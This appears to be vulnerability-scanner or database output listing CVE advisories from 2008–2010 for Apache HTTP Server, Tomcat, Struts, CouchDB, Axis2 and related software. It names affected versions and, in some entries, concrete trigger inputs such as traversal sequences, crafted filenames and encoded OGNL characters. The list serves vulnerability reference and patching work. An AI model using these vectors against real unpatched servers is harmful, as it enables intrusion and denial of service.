| [CVE-2010-4539] The walk function in repos.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.15, allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) via vectors that trigger the walking of SVNParentPath collections.
| [CVE-2010-4476] The Double.parseDouble method in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows remote attackers to cause a denial of service via a crafted string that triggers an infinite loop of estimations during conversion to a double-precision binary floating-point number, as demonstrated using 2.2250738585072012e-308.
| [CVE-2010-4455] Unspecified vulnerability in the Oracle HTTP Server component in Oracle Fusion Middleware 11.1.1.2 and 11.1.1.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Apache Plugin.
| [CVE-2010-4408] Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1 does not require entry of the administrator's password at the time of modifying a user account, which makes it easier for context-dependent attackers to gain privileges by leveraging a (1) unattended workstation or (2) cross-site request forgery (CSRF) vulnerability, a related issue to CVE-2010-3449.
| [CVE-2010-4312] The default configuration of Apache Tomcat 6.x does not include the HTTPOnly flag in a Set-Cookie header, which makes it easier for remote attackers to hijack a session via script access to a cookie.
| [CVE-2010-4172] Multiple cross-site scripting (XSS) vulnerabilities in the Manager application in Apache Tomcat 6.0.12 through 6.0.29 and 7.0.0 through 7.0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) orderBy or (2) sort parameter to sessionsList.jsp, or unspecified input to (3) sessionDetail.jsp or (4) java/org/apache/catalina/manager/JspHelper.java, related to use of untrusted web applications.
| [CVE-2010-3872] The fcgid_header_bucket_read function in fcgid_bucket.c in the mod_fcgid module before 2.3.6 for the Apache HTTP Server does not use bytewise pointer arithmetic in certain circumstances, which has unspecified impact and attack vectors related to "untrusted FastCGI applications" and a "stack buffer overwrite."
| [CVE-2010-3863] Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.
| [CVE-2010-3854] Multiple cross-site scripting (XSS) vulnerabilities in the web administration interface (aka Futon) in Apache CouchDB 0.8.0 through 1.0.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2010-3718] Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.
| [CVE-2010-3449] Cross-site request forgery (CSRF) vulnerability in Redback before 1.2.4, as used in Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1
| [CVE-2010-3315] authz.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x before 1.5.8 and 1.6.x before 1.6.13, when SVNPathAuthz short_circuit is enabled, does not properly handle a named repository as a rule scope, which allows remote authenticated users to bypass intended access restrictions via svn commands.
| [CVE-2010-3083] sys/ssl/SslSocket.cpp in qpidd in Apache Qpid, as used in Red Hat Enterprise MRG before 1.2.2 and other products, when SSL is enabled, allows remote attackers to cause a denial of service (daemon outage) by connecting to the SSL port but not participating in an SSL handshake.
| [CVE-2010-2952] Apache Traffic Server before 2.0.1, and 2.1.x before 2.1.2-unstable, does not properly choose DNS source ports and transaction IDs, and does not properly use DNS query fields to validate responses, which makes it easier for man-in-the-middle attackers to poison the internal DNS cache via a crafted response.
| [CVE-2010-2791] mod_proxy in httpd in Apache HTTP Server 2.2.9, when running on Unix, does not close the backend connection if a timeout occurs when reading a response from a persistent connection, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request. NOTE: this is the same issue as CVE-2010-2068, but for a different OS and set of affected versions.
| [CVE-2010-2375] Package/Privilege: Plugins for Apache, Sun and IIS web servers Unspecified vulnerability in the WebLogic Server component in Oracle Fusion Middleware 7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, and 10.3.3 allows remote attackers to affect confidentiality and integrity, related to IIS.
| [CVE-2010-2234] Cross-site request forgery (CSRF) vulnerability in Apache CouchDB 0.8.0 through 0.11.0 allows remote attackers to hijack the authentication of administrators for direct requests to an installation URL.
| [CVE-2010-2227] Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not properly handle an invalid Transfer-Encoding header, which allows remote attackers to cause a denial of service (application outage) or obtain sensitive information via a crafted header that interferes with "recycling of a buffer."
| [CVE-2010-2103] Cross-site scripting (XSS) vulnerability in axis2-admin/axis2-admin/engagingglobally in the administration console in Apache Axis2/Java 1.4.1, 1.5.1, and possibly other versions, as used in SAP Business Objects 12, 3com IMC, and possibly other products, allows remote attackers to inject arbitrary web script or HTML via the modules parameter. NOTE: some of these details are obtained from third party information.
| [CVE-2010-2086] Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that involve modifying the serialized view object.
| [CVE-2010-2076] Apache CXF 2.0.x before 2.0.13, 2.1.x before 2.1.10, and 2.2.x before 2.2.9, as used in Apache ServiceMix, Apache Camel, Apache Chemistry, Apache jUDDI, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to samples/wsdl_first_pure_xml, a similar issue to CVE-2010-1632.
| [CVE-2010-2068] mod_proxy_http.c in mod_proxy_http in the Apache HTTP Server 2.2.9 through 2.2.15, 2.3.4-alpha, and 2.3.5-alpha on Windows, NetWare, and OS/2, in certain configurations involving proxy worker pools, does not properly detect timeouts, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request.
| [CVE-2010-2057] shared/util/StateUtils.java in Apache MyFaces 1.1.x before 1.1.8, 1.2.x before 1.2.9, and 2.0.x before 2.0.1 uses an encrypted View State without a Message Authentication Code (MAC), which makes it easier for remote attackers to perform successful modifications of the View State via a padding oracle attack.
| [CVE-2010-1632] Apache Axis2 before 1.5.2, as used in IBM WebSphere Application Server (WAS) 7.0 through 7.0.0.12, IBM Feature Pack for Web Services 6.1.0.9 through 6.1.0.32, IBM Feature Pack for Web 2.0 1.0.1.0, Apache Synapse, Apache ODE, Apache Tuscany, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to the Synapse SimpleStockQuoteService.
| [CVE-2010-1623] Memory leak in the apr_brigade_split_line function in buckets/apr_brigade.c in the Apache Portable Runtime Utility library (aka APR-util) before 1.3.10, as used in the mod_reqtimeout module in the Apache HTTP Server and other software, allows remote attackers to cause a denial of service (memory consumption) via unspecified vectors related to the destruction of an APR bucket.
| [CVE-2010-1587] The Jetty ResourceHandler in Apache ActiveMQ 5.x before 5.3.2 and 5.4.x before 5.4.0 allows remote attackers to read JSP source code via a // (slash slash) initial substring in a URI for (1) admin/index.jsp, (2) admin/queues.jsp, or (3) admin/topics.jsp.
| [CVE-2010-1452] The (1) mod_cache and (2) mod_dav modules in the Apache HTTP Server 2.2.x before 2.2.16 allow remote attackers to cause a denial of service (process crash) via a request that lacks a path.
| [CVE-2010-1325] Cross-site request forgery (CSRF) vulnerability in the apache2-slms package in SUSE Lifecycle Management Server (SLMS) 1.0 on SUSE Linux Enterprise (SLE) 11 allows remote attackers to hijack the authentication of unspecified victims via vectors related to improper parameter quoting. NOTE: some sources report that this is a vulnerability in a product named "Apache SLMS," but that is incorrect.
| [CVE-2010-1244] Cross-site request forgery (CSRF) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote attackers to hijack the authentication of unspecified victims for requests that create queues via the JMSDestination parameter in a queue action.
| [CVE-2010-1157] Apache Tomcat 5.5.0 through 5.5.29 and 6.0.0 through 6.0.26 might allow remote attackers to discover the server's hostname or IP address by sending a request for a resource that requires (1) BASIC or (2) DIGEST authentication, and then reading the realm field in the WWW-Authenticate header in the reply.
| [CVE-2010-1151] Race condition in the mod_auth_shadow module for the Apache HTTP Server allows remote attackers to bypass authentication, and read and possibly modify data, via vectors related to improper interaction with an external helper application for validation of credentials.
| [CVE-2010-0684] Cross-site scripting (XSS) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote authenticated users to inject arbitrary web script or HTML via the JMSDestination parameter in a queue action.
| [CVE-2010-0434] The ap_read_request function in server/protocol.c in the Apache HTTP Server 2.2.x before 2.2.15, when a multithreaded MPM is used, does not properly handle headers in subrequests in certain circumstances involving a parent request that has a body, which might allow remote attackers to obtain sensitive information via a crafted request that triggers access to memory locations associated with an earlier request.
| [CVE-2010-0432] Multiple cross-site scripting (XSS) vulnerabilities in the Apache Open For Business Project (aka OFBiz) 09.04 and earlier, as used in Opentaps, Neogia, and Entente Oya, allow remote attackers to inject arbitrary web script or HTML via (1) the productStoreId parameter to control/exportProductListing, (2) the partyId parameter to partymgr/control/viewprofile (aka partymgr/control/login), (3) the start parameter to myportal/control/showPortalPage, (4) an invalid URI beginning with /facility/control/ReceiveReturn (aka /crmsfa/control/ReceiveReturn or /cms/control/ReceiveReturn), (5) the contentId parameter (aka the entityName variable) to ecommerce/control/ViewBlogArticle, (6) the entityName parameter to webtools/control/FindGeneric, or the (7) subject or (8) content parameter to an unspecified component under ecommerce/control/contactus.
| [CVE-2010-0425] modules/arch/win32/mod_isapi.c in mod_isapi in the Apache HTTP Server 2.0.37 through 2.0.63, 2.2.0 through 2.2.14, and 2.3.x before 2.3.7, when running on Windows, does not ensure that request processing is complete before calling isapi_unload for an ISAPI .dll module, which allows remote attackers to execute arbitrary code via unspecified vectors related to a crafted request, a reset packet, and "orphaned callback pointers."
| [CVE-2010-0408] The ap_proxy_ajp_request function in mod_proxy_ajp.c in mod_proxy_ajp in the Apache HTTP Server 2.2.x before 2.2.15 does not properly handle certain situations in which a client sends no request body, which allows remote attackers to cause a denial of service (backend server outage) via a crafted request, related to use of a 500 error code instead of the appropriate 400 error code.
| [CVE-2010-0390] Unrestricted file upload vulnerability in maxImageUpload/index.php in PHP F1 Max's Image Uploader 1.0, when Apache is not configured to handle the mime-type for files with pjpeg or jpeg extensions, allows remote attackers to execute arbitrary code by uploading a file with a pjpeg or jpeg extension, then accessing it via a direct request to the file in original/. NOTE: some of these details are obtained from third party information.
| [CVE-2010-0219] Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
| [CVE-2010-0010] Integer overflow in the ap_proxy_send_fb function in proxy/proxy_util.c in mod_proxy in the Apache HTTP Server before 1.3.42 on 64-bit platforms allows remote origin servers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a large chunk size that triggers a heap-based buffer overflow.
| [CVE-2010-0009] Apache CouchDB 0.8.0 through 0.10.1 allows remote attackers to obtain sensitive information by measuring the completion time of operations that verify (1) hashes or (2) passwords.
| [CVE-2009-5120] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 allows connections to TCP port 1812 from arbitrary source IP addresses, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via UTF-7 text to the 404 error page of a Project Woodstock service on this port.
| [CVE-2009-5119] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 enables weak SSL ciphers in conf/server.xml, which makes it easier for remote attackers to obtain sensitive information by sniffing the network and then conducting a brute-force attack against encrypted session data.
| [CVE-2009-5006] The SessionAdapter::ExchangeHandlerImpl::checkAlternate function in broker/SessionAdapter.cpp in the C++ Broker component in Apache Qpid before 0.6, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote authenticated users to cause a denial of service (NULL pointer dereference, daemon crash, and cluster outage) by attempting to modify the alternate of an exchange.
| [CVE-2009-5005] The Cluster::deliveredEvent function in cluster/Cluster.cpp in Apache Qpid, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote attackers to cause a denial of service (daemon crash and cluster outage) via invalid AMQP data.
| [CVE-2009-4355] Memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and 1.0.0 Beta through Beta 4 allows remote attackers to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function, as demonstrated by use of SSLv3 and PHP with the Apache HTTP Server, a related issue to CVE-2008-1678.
| [CVE-2009-4269] The password hash generation algorithm in the BUILTIN authentication functionality for Apache Derby before 10.6.1.0 performs a transformation that reduces the size of the set of inputs to SHA-1, which produces a small search space that makes it easier for local and possibly remote attackers to crack passwords by generating hash collisions, related to password substitution.
| [CVE-2009-3923] The VirtualBox 2.0.8 and 2.0.10 web service in Sun Virtual Desktop Infrastructure (VDI) 3.0 does not require authentication, which allows remote attackers to obtain unspecified access via vectors involving requests to an Apache HTTP Server.
| [CVE-2009-3890] Unrestricted file upload vulnerability in the wp_check_filetype function in wp-includes/functions.php in WordPress before 2.8.6, when a certain configuration of the mod_mime module in the Apache HTTP Server is enabled, allows remote authenticated users to execute arbitrary code by posting an attachment with a multiple-extension filename, and then accessing this attachment via a direct request to a wp-content/uploads/ pathname, as demonstrated by a .php.jpg filename.
| [CVE-2009-3843] HP Operations Manager 8.10 on Windows contains a "hidden account" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.
| [CVE-2009-3821] Cross-site scripting (XSS) vulnerability in the Apache Solr Search (solr) extension 1.0.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2009-3555] The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue.
10507| [CVE-2009-3548] The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.
10508| [CVE-2009-3250] The saveForwardAttachments procedure in the Compose Mail functionality in vtiger CRM 5.0.4 allows remote authenticated users to execute arbitrary code by composing an e-mail message with an attachment filename ending in (1) .php in installations based on certain Apache HTTP Server configurations, (2) .php. on Windows, or (3) .php/ on Linux, and then making a direct request to a certain pathname under storage/.
10509| [CVE-2009-3095] The mod_proxy_ftp module in the Apache HTTP Server allows remote attackers to bypass intended access restrictions and send arbitrary commands to an FTP server via vectors related to the embedding of these commands in the Authorization HTTP header, as demonstrated by a certain module in VulnDisco Pack Professional 8.11.
| [CVE-2009-3094] The ap_proxy_ftp_handler function in modules/proxy/proxy_ftp.c in the mod_proxy_ftp module in the Apache HTTP Server 2.0.63 and 2.2.13 allows remote FTP servers to cause a denial of service (NULL pointer dereference and child process crash) via a malformed reply to an EPSV command.
| [CVE-2009-2902] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to delete work-directory files via directory traversal sequences in a WAR filename, as demonstrated by the ...war filename.
| [CVE-2009-2901] The autodeployment process in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20, when autoDeploy is enabled, deploys appBase files that remain from a failed undeploy, which might allow remote attackers to bypass intended authentication requirements via HTTP requests.
| [CVE-2009-2823] The Apache HTTP Server in Apple Mac OS X before 10.6.2 enables the HTTP TRACE method, which allows remote attackers to conduct cross-site scripting (XSS) attacks via unspecified web client software.
| [CVE-2009-2699] The Solaris pollset feature in the Event Port backend in poll/unix/port.c in the Apache Portable Runtime (APR) library before 1.3.9, as used in the Apache HTTP Server before 2.2.14 and other products, does not properly handle errors, which allows remote attackers to cause a denial of service (daemon hang) via unspecified HTTP requests, related to the prefork and event MPMs.
| [CVE-2009-2696] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat on Red Hat Enterprise Linux 5, Desktop Workstation 5, and Linux Desktop 5 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML." NOTE: this is due to a missing fix for CVE-2009-0781.
| [CVE-2009-2693] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to create or overwrite arbitrary files via a .. (dot dot) in an entry in a WAR file, as demonstrated by a ../../bin/catalina.bat entry.
| [CVE-2009-2625] XMLScanner.java in Apache Xerces2 Java, as used in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework.
| [CVE-2009-2412] Multiple integer overflows in the Apache Portable Runtime (APR) library and the Apache Portable Utility library (aka APR-util) 0.9.x and 1.3.x allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors that trigger crafted calls to the (1) allocator_alloc or (2) apr_palloc function in memory/unix/apr_pools.c in APR
| [CVE-2009-2299] The Artofdefence Hyperguard Web Application Firewall (WAF) module before 2.5.5-11635, 3.0 before 3.0.3-11636, and 3.1 before 3.1.1-11637, a module for the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via an HTTP request with a large Content-Length value but no POST data.
| [CVE-2009-1956] Off-by-one error in the apr_brigade_vprintf function in Apache APR-util before 1.3.5 on big-endian platforms allows remote attackers to obtain sensitive information or cause a denial of service (application crash) via crafted input.
| [CVE-2009-1955] The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564.
| [CVE-2009-1903] The PDF XSS protection feature in ModSecurity before 2.5.8 allows remote attackers to cause a denial of service (Apache httpd crash) via a request for a PDF file that does not use the GET method.
| [CVE-2009-1891] The mod_deflate module in Apache httpd 2.2.11 and earlier compresses large files until completion even after the associated network connection is closed, which allows remote attackers to cause a denial of service (CPU consumption).
| [CVE-2009-1890] The stream_reqbody_cl function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server before 2.3.3, when a reverse proxy is configured, does not properly handle an amount of streamed data that exceeds the Content-Length value, which allows remote attackers to cause a denial of service (CPU consumption) via crafted requests.
| [CVE-2009-1885] Stack consumption vulnerability in validators/DTD/DTDScanner.cpp in Apache Xerces C++ 2.7.0 and 2.8.0 allows context-dependent attackers to cause a denial of service (application crash) via vectors involving nested parentheses and invalid byte values in "simply nested DTD structures," as demonstrated by the Codenomicon XML fuzzing framework.
| [CVE-2009-1462] The Security Manager in razorCMS before 0.4 does not verify the permissions of every file owned by the apache user account, which is inconsistent with the documentation and allows local users to have an unspecified impact.
| [CVE-2009-1275] Apache Tiles 2.1 before 2.1.2, as used in Apache Struts and other products, evaluates Expression Language (EL) expressions twice in certain circumstances, which allows remote attackers to conduct cross-site scripting (XSS) attacks or obtain sensitive information via unspecified vectors, related to the (1) tiles:putAttribute and (2) tiles:insertTemplate JSP tags.
| [CVE-2009-1195] The Apache HTTP Server 2.2.11 and earlier 2.2 versions does not properly handle Options=IncludesNOEXEC in the AllowOverride directive, which allows local users to gain privileges by configuring (1) Options Includes, (2) Options +Includes, or (3) Options +IncludesNOEXEC in a .htaccess file, and then inserting an exec element in a .shtml file.
| [CVE-2009-1191] mod_proxy_ajp.c in the mod_proxy_ajp module in the Apache HTTP Server 2.2.11 allows remote attackers to obtain sensitive response data, intended for a client that sent an earlier POST request with no request body, via an HTTP request.
| [CVE-2009-1012] Unspecified vulnerability in the plug-ins for Apache and IIS web servers in Oracle BEA WebLogic Server 7.0 Gold through SP7, 8.1 Gold through SP6, 9.0, 9.1, 9.2 Gold through MP3, 10.0 Gold through MP1, and 10.3 allows remote attackers to affect confidentiality, integrity, and availability. NOTE: the previous information was obtained from the April 2009 CPU. Oracle has not commented on claims from a reliable researcher that this is an integer overflow in an unspecified plug-in that parses HTTP requests, which leads to a heap-based buffer overflow.
| [CVE-2009-0918] Multiple unspecified vulnerabilities in DFLabs PTK 1.0.0 through 1.0.4 allow remote attackers to execute arbitrary commands in processes launched by PTK's Apache HTTP Server via (1) "external tools" or (2) a crafted forensic image.
| [CVE-2009-0796] Cross-site scripting (XSS) vulnerability in Status.pm in Apache::Status and Apache2::Status in mod_perl1 and mod_perl2 for the Apache HTTP Server, when /perl-status is accessible, allows remote attackers to inject arbitrary web script or HTML via the URI.
| [CVE-2009-0783] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application.
| [CVE-2009-0781] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML."
| [CVE-2009-0754] PHP 4.4.4, 5.1.6, and other versions, when running on Apache, allows local users to modify behavior of other sites hosted on the same web server by modifying the mbstring.func_overload setting within .htaccess, which causes this setting to be applied to other virtual hosts on the same server.
| [CVE-2009-0580] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when FORM authentication is used, allows remote attackers to enumerate valid usernames via requests to /j_security_check with malformed URL encoding of passwords, related to improper error checking in the (1) MemoryRealm, (2) DataSourceRealm, and (3) JDBCRealm authentication realms, as demonstrated by a % (percent) value for the j_password parameter.
| [CVE-2009-0486] Bugzilla 3.2.1, 3.0.7, and 3.3.2, when running under mod_perl, calls the srand function at startup time, which causes Apache children to have the same seed and produce insufficiently random numbers for random tokens, which allows remote attackers to bypass cross-site request forgery (CSRF) protection mechanisms and conduct unauthorized activities as other users.
| [CVE-2009-0039] Multiple cross-site request forgery (CSRF) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to hijack the authentication of administrators for requests that (1) change the web administration password, (2) upload applications, and perform unspecified other administrative actions, as demonstrated by (3) a Shutdown request to console/portal//Server/Shutdown.
| [CVE-2009-0038] Multiple cross-site scripting (XSS) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) ip, (3) username, or (4) description parameter to console/portal/Server/Monitoring
| [CVE-2009-0033] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when the Java AJP connector and mod_jk load balancing are used, allows remote attackers to cause a denial of service (application outage) via a crafted request with invalid headers, related to temporary blocking of connectors that have encountered errors, as demonstrated by an error involving a malformed HTTP Host header.
| [CVE-2009-0026] Multiple cross-site scripting (XSS) vulnerabilities in Apache Jackrabbit before 1.5.2 allow remote attackers to inject arbitrary web script or HTML via the q parameter to (1) search.jsp or (2) swr.jsp.
| [CVE-2009-0023] The apr_strmatch_precompile function in strmatch/apr_strmatch.c in Apache APR-util before 1.3.5 allows remote attackers to cause a denial of service (daemon crash) via crafted input involving (1) a .htaccess file used with the Apache HTTP Server, (2) the SVNMasterURI directive in the mod_dav_svn module in the Apache HTTP Server, (3) the mod_apreq2 module for the Apache HTTP Server, or (4) an application that uses the libapreq2 library, which triggers a heap-based buffer underflow.
| [CVE-2008-6879] Cross-site scripting (XSS) vulnerability in Apache Roller 2.3, 3.0, 3.1, and 4.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action.
| [CVE-2008-6755] ZoneMinder 1.23.3 on Fedora 10 sets the ownership of /etc/zm.conf to the apache user account, and sets the permissions to 0600, which makes it easier for remote attackers to modify this file by accessing it through a (1) PHP or (2) CGI script.
| [CVE-2008-6722] Novell Access Manager 3 SP4 does not properly expire X.509 certificate sessions, which allows physically proximate attackers to obtain a logged-in session by using a victim's web-browser process that continues to send the original and valid SSL sessionID, related to inability of Apache Tomcat to clear entries from its SSL cache.
| [CVE-2008-6682] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.x before 2.0.11.1 and 2.1.x before 2.1.1 allow remote attackers to inject arbitrary web script or HTML via vectors associated with improper handling of (1) " (double quote) characters in the href attribute of an s:a tag and (2) parameters in the action attribute of an s:url tag.
| [CVE-2008-6505] Multiple directory traversal vulnerabilities in Apache Struts 2.0.x before 2.0.12 and 2.1.x before 2.1.3 allow remote attackers to read arbitrary files via a ..%252f (encoded dot dot slash) in a URI with a /struts/ path, related to (1) FilterDispatcher in 2.0.x and (2) DefaultStaticContentLoader in 2.1.x.
| [CVE-2008-6504] ParametersInterceptor in OpenSymphony XWork 2.0.x before 2.0.6 and 2.1.x before 2.1.2, as used in Apache Struts and other products, does not properly restrict # (pound sign) references to context objects, which allows remote attackers to execute Object-Graph Navigation Language (OGNL) statements and modify server-side context objects, as demonstrated by use of a \u0023 representation for the # character.
| [CVE-2008-5696] Novell NetWare 6.5 before Support Pack 8, when an OES2 Linux server is installed into the NDS tree, does not require a password for the ApacheAdmin console, which allows remote attackers to reconfigure the Apache HTTP Server via console operations.
| [CVE-2008-5676] Multiple unspecified vulnerabilities in the ModSecurity (aka mod_security) module 2.5.0 through 2.5.5 for the Apache HTTP Server, when SecCacheTransformations is enabled, allow remote attackers to cause a denial of service (daemon crash) or bypass the product's functionality via unknown vectors related to "transformation caching."
| [CVE-2008-5519] The JK Connector (aka mod_jk) 1.2.0 through 1.2.26 in Apache Tomcat allows remote attackers to obtain sensitive information via an arbitrary request from an HTTP client, in opportunistic circumstances involving (1) a request from a different client that included a Content-Length header but no POST data or (2) a rapid series of requests, related to noncompliance with the AJP protocol's requirements for requests containing Content-Length headers.
| [CVE-2008-5518] Multiple directory traversal vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 on Windows allow remote attackers to upload files to arbitrary directories via directory traversal sequences in the (1) group, (2) artifact, (3) version, or (4) fileType parameter to console/portal//Services/Repository (aka the Services/Repository portlet)
| [CVE-2008-5515] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, 6.0.0 through 6.0.18, and possibly earlier versions normalizes the target pathname before filtering the query string when using the RequestDispatcher method, which allows remote attackers to bypass intended access restrictions and conduct directory traversal attacks via .. (dot dot) sequences and the WEB-INF directory in a Request.
| [CVE-2008-5457] Unspecified vulnerability in the Oracle BEA WebLogic Server Plugins for Apache, Sun and IIS web servers component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
| [CVE-2008-4308] The doRead method in Apache Tomcat 4.1.32 through 4.1.34 and 5.5.10 through 5.5.20 does not return a -1 to indicate when a certain error condition has occurred, which can cause Tomcat to send POST content from one request to a different request.
| [CVE-2008-4008] Unspecified vulnerability in the WebLogic Server Plugins for Apache component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2008 CPU. Oracle has not commented on reliable researcher claims that this issue is a stack-based buffer overflow in the WebLogic Apache Connector, related to an invalid parameter.
| [CVE-2008-3666] Unspecified vulnerability in Sun Solaris 10 and OpenSolaris before snv_96 allows (1) context-dependent attackers to cause a denial of service (panic) via vectors involving creation of a crafted file and use of the sendfilev system call, as demonstrated by a file served by an Apache 2.2.x web server with EnableSendFile configured
| [CVE-2008-3271] Apache Tomcat 5.5.0 and 4.1.0 through 4.1.31 allows remote attackers to bypass an IP address restriction and obtain sensitive information via a request that is processed concurrently with another request but in a different thread, leading to an instance-variable overwrite associated with a "synchronization problem" and lack of thread safety, and related to RemoteFilterValve, RemoteAddrValve, and RemoteHostValve.
| [CVE-2008-3257] Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after "POST /.jsp" in an HTTP request.
| [CVE-2008-2939] Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apache 2.0.63 and earlier, and mod_proxy_ftp.c in the mod_proxy_ftp module in Apache 2.2.9 and earlier 2.2 versions, allows remote attackers to inject arbitrary web script or HTML via a wildcard in the last directory component in the pathname in an FTP URI.
